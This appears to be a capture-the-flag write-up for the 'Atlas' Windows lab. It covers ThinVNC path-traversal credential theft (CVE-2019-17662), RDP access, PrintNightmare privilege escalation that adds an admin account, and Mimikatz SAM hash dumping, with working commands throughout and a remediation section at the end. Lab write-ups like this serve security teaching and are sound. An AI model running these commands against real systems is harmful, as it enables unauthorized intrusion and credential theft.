Target IP: atlas.thm (Requires /etc/hosts entry)
Difficulty: Medium
Objective: User & Root Flags
1. Executive Summary
“Atlas” is a Windows Server environment named GAIA. The primary vector involves exploiting an outdated ThinVNC instance (CVE-2019-17662) running on port 8080. This vulnerability allows unauthenticated arbitrary file reads, leaking plaintext credentials from the configuration file. Initial access is established via RDP using these credentials. Privilege escalation is achieved by exploiting the PrintNightmare vulnerability (CVE-2021-1675) in the Windows Print Spooler service to create a local administrator account.
Key TTPs (MITRE ATT&CK):
- T1190 (Exploit Public-Facing App): Exploiting ThinVNC via Path Traversal.
- T1552 (Unsecured Credentials): Reading plaintext passwords from
ThinVNC.ini. - T1021 (Remote Services): Lateral movement from VNC to RDP.
- T1068 (Exploitation for Privilege Escalation): PrintNightmare (Spooler Service).
- T1003 (OS Credential Dumping): Using Mimikatz to dump SAM hashes.
2. Operational Setup
OpSec Note: “No tricks, just reality.” Always prepare your environment.
Host Configuration
# Map the target
echo "10.10.x.x atlas.thm" | sudo tee -a /etc/hostsWorkspace (Tmux)
- Pane 1 (Recon):
nmap,xfreerdp. - Pane 2 (Exploit): Serving files (
python3 -m http.server), Exploit execution. - Pane 3 (Notes): Documentation.
3. Enumeration: “What do we see?”
A. Network Scanning
We start with a service version scan.
nmap -sC -sV -oA nmap/atlas atlas.thmAnalysis:
-
3389/tcp (RDP):
Microsoft Terminal Services. -
Hostname:
GAIA. (Useful for authentication contexts). -
OS: Windows Server 2019 (Based on build 17763).
-
8080/tcp (HTTP-Proxy):
-
Header:
WWW-Authenticate: Digest realm="ThinVNC". -
Context: ThinVNC is a web-based remote desktop solution. The banner specifically mentions “ThinVNC”.
B. Vulnerability Analysis (ThinVNC)
The Nmap scan reveals ThinVNC. A quick search (searchsploit ThinVNC) or Google search points to CVE-2019-17662.
The Vulnerability (Why it works):
ThinVNC versions prior to a certain patch are vulnerable to Arbitrary File Read via Path Traversal. The server does not properly sanitize file paths in the URL, allowing us to traverse out of the web root and read local files. Even worse, ThinVNC stores credentials in ThinVNC.ini in the installation directory.
4. Initial Access: CVE-2019-17662
A. Manual Verification (The “No Script Kiddie” Way)
Before running a Python script from GitHub, let’s understand the request. The exploit targets the /downloads endpoint or similar unauthenticated paths to traverse back to the config file.
Discovery:
The configuration file is typically located at C:\Program Files\ThinVNC\ThinVNC.ini.
Exploitation:
We can likely read this file directly via the browser or curl. The exploit logic usually looks for:
http://atlas.thm:8080/../../ThinVNC.ini (simplified).
However, using the published exploit script is efficient here if the traversal logic is complex.
B. Credential Extraction
Running the exploit script:
python3 cve-2019-17662.py http://atlas.thm:8080Output (Example):
[Permissions]
AllowAnonymous=0
AllowDigest=1
...
[Users]
User1=admin
Pass1=s3cr3tP@ssw0rd! <-- Plaintext!Credentials Found:
- User:
admin(or similar from the output) - Password:
[REDACTED]
C. The Switch (VNC -> RDP)
We could log in via the web browser on port 8080, but web-based VNC is laggy and has poor clipboard support. Since port 3389 is open, we assume these credentials are valid system credentials (or the user reused them).
Connect via xfreerdp:
# /v:Target /u:User /p:Password /dynamic-resolution +clipboard /drive:share,/tmp
xfreerdp /v:atlas.thm /u:admin /p:'s3cr3tP@ssw0rd!' /dynamic-resolution +clipboard /drive:share,/tmp- Note: We map our local
/tmpdirectory to the remote machine using/drive:share,/tmp. This is crucial for transferring exploits (PrintNightmare) later without needing internet access on the target.
Status: We are in as a standard user.
5. Privilege Escalation: PrintNightmare (CVE-2021-1675)
Enumeration
Once inside via RDP:
- Open PowerShell.
- Check Privileges:
whoami /priv(Standard user). - Check OS Version:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"(Server 2019). - Check Services: Is the Print Spooler running?
Get-Service -Name SpoolerResult: Running.
The Vulnerability
PrintNightmare allows an authenticated user to remotely install a printer driver. By specifying a malicious driver (DLL) or manipulating the driver path, we can execute code as SYSTEM because the Spooler service runs with high privileges.
Exploitation (PowerShell Method)
We will use the PowerShell implementation (CVE-2021-1675.ps1 / Caleb Stewart’s version) which is cleaner than compiling a DLL.
- Transfer the Exploit: Since we mounted our drive in xfreerdp, we can access the script directly.
# Copy from our shared drive to a writable folder
copy \\tsclient\share\CVE-2021-1675.ps1 C:\Windows\Temp\privesc.ps1- Import and Execute: We will force the Spooler to create a new local administrator account.
cd C:\Windows\Temp
Import-Module .\privesc.ps1
Invoke-Nightmare -NewUser "adm1n" -NewPassword "P@ssw0rd123!" -DriverName "Xerox"- Verification:
net user adm1nResult: Local Group Memberships *Administrators
Post-Exploitation (Looting)
Now we switch to our new Admin user to dump secrets.
- Start High-Integrity Shell:
Right-click cmd.exe -> “Run as different user” ->
adm1n:P@ssw0rd123!. - Run Mimikatz:
Transfer
mimikatz.exe(using the RDP share again).
mimikatz.exe
# Inside Mimikatz:
privilege::debug
token::elevate
lsadump::samResult: You now have the NTLM hash of the built-in Administrator and any other users.
6. Remediation (Blue Team)
- Patch ThinVNC:
- Update ThinVNC to the latest version immediately.
- Configuration: Ensure configuration files (
.ini) are not accessible via the web root and do not store passwords in plaintext.
- Disable Print Spooler:
- On a Domain Controller or critical server, the Print Spooler service should be Disabled unless explicitly required for printing.
- Command:
Stop-Service Spooler -Force; Set-Service Spooler -StartupType Disabled.
- Patch Windows (PrintNightmare):
- Apply the critical security updates from Microsoft (July 2021 onwards) that address CVE-2021-1675 and CVE-2021-34527.